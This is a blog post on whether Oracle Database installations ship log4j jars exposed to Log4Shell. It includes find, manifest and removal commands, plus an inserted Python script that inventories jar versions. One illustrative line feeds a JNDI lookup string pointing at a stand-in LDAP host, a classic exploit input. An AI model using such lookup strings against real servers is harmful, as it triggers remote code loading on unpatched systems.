Log4J and Oracle Database

CVE-2021-44228 allows an unauthenticated user to execute code. It is tremendously easy to exploit; it is more a working-as-designed feature than a hard-core memory glitch.

Log4j is a logging library for Java. If you enter some unexpected string, your web server may log it to a logfile.

  • What’s your name?
  • John
  • What’s your age?
  • 1000
  • Come on, that’s not possible
2021-01-05 John says he's 1000

So far so good. But one log4j developer probably found it useful to add variable expansion and the like:

  • What’s your name?
  • John
  • What’s your age?
  • ${JNDI:ldaps://example.com/rm-rf-*}
  • Come on, that’s not possible
2021-01-05 John says he's 1m files removed

Server attacked. This of course works best when multiple flaws exist, there are no firewalls and the web server logs everything with log4j.

Anyway, it isn’t a good feeling to be at risk.

It requires some careful reading to check whether Oracle Database is affected.

One may check Oracle Support doc 2828877.1:

Oracle Database (all supported versions including 11.2, 12.1, 12.2, 19c, and 21c) are not affected by vulnerability CVE-2021-44228 or CVE-2021-45046.

But the innocent reader may stop here.

Let’s check some software, for instance RDBMS 19.6:

$ find . -name "log4j-core*.jar"
./suptools/tfa/release/tfa_home/jlib/log4j-core-2.9.1.jar
./md/property_graph/lib/log4j-core-2.11.0.jar

What??? Isn’t that log4j lying around?

Other notes state that CVE-2021-45105, CVE-2021-44228 and CVE-2021-45046 are addressed in AHF Version 21.4:

$ suptools/tfa/release/tfa_home/bin/tfactl version
/oracle/suptools/tfa/release/tfa_home/bin
TFA Version : 183300
TFA Build ID : 20190315044534

So there I am at risk.

  • WARNING: removing TFA prevents autopatch from patching

Two solutions: update TFA if you need it, or remove it with

tfactl uninstall

(rm will also do)

What does Oracle say about md?

Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45104, and CVE-2021-45105 concern Spatial in versions 12.2, 18.x, and 21.x. 

If you use Spatial, then patch it. Otherwise, Oracle recommends removing the whole md/property_graph directory (doc 2652121.1):

rm -r md/property_graph

12.1 (also the client) has a few log4j-core jars, but version 1.x, which is older and less critical. But given the log4j hysteria, you may want to remove some of those, like $ORACLE_HOME/oui/jlib/jlib/log4j-core.jar. The version is in the jar manifest:

$ unzip -p oui/jlib/jlib/log4j-core.jar META-INF/MANIFEST.MF | grep Implementation-Version
Implementation-Version: 1.1.1
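The find and manifest checks above can be combined into one inventory pass. The script below is an added example, not code from the post or from Oracle: it walks an ORACLE_HOME for log4j-core jars, reads Implementation-Version from each manifest (falling back to the file name, as the 19.6 jars carry the version there), and flags 2.x builds below the 2.17.0 floor; the Java 6/7 backport floors 2.3.1 and 2.12.3 are an assumption of this example.

```python
import re
import zipfile
from pathlib import Path

# Floors that close CVE-2021-44228/45046/45105: 2.17.0 on the main line,
# plus the Java 6/7 backport branches (assumption: treated as fixed here).
FIXED_2X = {(2, 3): (2, 3, 1), (2, 12): (2, 12, 3)}
FIXED_MAIN = (2, 17, 0)

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def jar_version(jar: Path):
    """Version tuple from META-INF/MANIFEST.MF, else from the jar file name."""
    try:
        with zipfile.ZipFile(jar) as zf:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        for line in manifest.splitlines():
            if line.startswith("Implementation-Version:"):
                m = VERSION_RE.search(line)
                if m:
                    return tuple(int(x or 0) for x in m.groups())
    except (zipfile.BadZipFile, KeyError, OSError):
        pass  # not a zip, or no manifest: fall back to the file name
    m = VERSION_RE.search(jar.name)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def classify(version):
    """'vulnerable', 'fixed', 'log4j-1.x' or 'unknown' for one jar version."""
    if version is None:
        return "unknown"
    if version[0] == 1:
        return "log4j-1.x"  # EOL line, not CVE-2021-44228, still worth removing
    if version[0] != 2:
        return "unknown"
    floor = FIXED_2X.get(version[:2], FIXED_MAIN)
    return "fixed" if version >= floor else "vulnerable"


def scan_oracle_home(oracle_home):
    """Same search as the find in the post, with a verdict per jar."""
    root = Path(oracle_home)
    results = []
    for jar in sorted(root.rglob("log4j-core*.jar")):
        version = jar_version(jar)
        results.append((str(jar.relative_to(root)), version, classify(version)))
    return results
```

Run it as `scan_oracle_home("/oracle")` and remove or patch every jar that does not come back as fixed.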

Minimizing the impact of log4j is one thing, but pretending we’re unaffected isn’t really helpful.

1 thought on “Log4J and Oracle Database”

  1. Laurent Schneider Post author

    One of those days, your secadmin will scan your server for old log4j classes, better remove yours now to avoid negative visibility
